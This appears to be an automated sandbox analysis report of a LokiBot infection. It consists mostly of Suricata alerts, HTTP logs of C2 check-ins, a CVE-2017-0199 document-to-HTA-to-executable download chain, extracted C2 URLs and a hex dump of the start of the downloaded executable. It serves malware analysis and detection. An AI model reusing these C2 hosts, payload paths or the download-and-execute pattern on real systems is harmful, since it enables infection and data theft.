Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49226 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49238 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49270
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49215 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49259 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49220 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49221 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49221 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49184
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49241
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49215 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49275 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49259 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49226
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49238
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49234
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49197
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49220 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49275 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49275 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49215 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49221 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49275 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49275 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49221 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49220
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49252 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49215 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49215 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49221 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49259 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49252 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49259 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49259 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49221

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.41/maxzi/five/fre.php

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

8_2_035F0499

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:11:24 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 20 Nov 2024 01:27:09 GMTETag: "92a00-6274e0c657f44"Accept-Ranges: bytesContent-Length: 600576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec 06 09 00 00 20 00 00 00 08 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 1d 00 00 00 40 09 00 00 1e 00 00 00 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 26 09 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 36 00 00 0c 28 00 00 03 00 00 00 16 00 00 06 b4 5e 00 00 e0 c7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 02 28 14 00 00 0a 02 03 7d 01 00 00 04 02 7b 01 00 00 04 72 01 00 00 70 20 d1 01 00 00 17 6f 35 00 00 06 02 7b 01 00 00 04 6f 37 00 00 06 26 2a 00 00 00 1b 30 03 00 1f 00 00 00 01 00 00 11 02 7b 01 00 00 04 03 04 6f 39 00 00 06 02 03 7d 02 00 00 04 17 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 18 18 00 05 0a 00 00 02 1b 30 03 00 74 00 00 00 02 00 00 11 05 6f 15 00 00 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 72 1f 00 00 70 28 16 00 00 0a 6f 3a 00 00 06 03 0a 16 0b 2b 25 06 07 9a 0c 02 7b 01 00 00 04 08 6f 17 00 00 0a 6f 3b 00 00 06 05 08 6f 18 00 00 0a de 03 26 de 00 07 17 58 0b 07 06 8e 69 32 d5 02 7b 01 00 00 04 04 6f 3c 00 00 06 17 0d de 10 26 02 7b 01 00 00 04 6f 3d 00 00 06 16 0d de 00 09 2a 01 1c 00 00 00 00 2b 00 1a 45 00 03 0a 00 00 02 00 00 06 00 5c 62 00 10 0a 00 00 02 32 02 7b 01 00 00 04 6f 41 00 00 06 2a 6e 02 28 19 00 00 0a 02 03 7d 03 00 00 04 02

Source: Joe Sandbox View	ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: Joe Sandbox View	ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic

Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49169 -> 66.63.187.231:80

Source: global traffic	HTTP traffic detected: GET /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.231Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
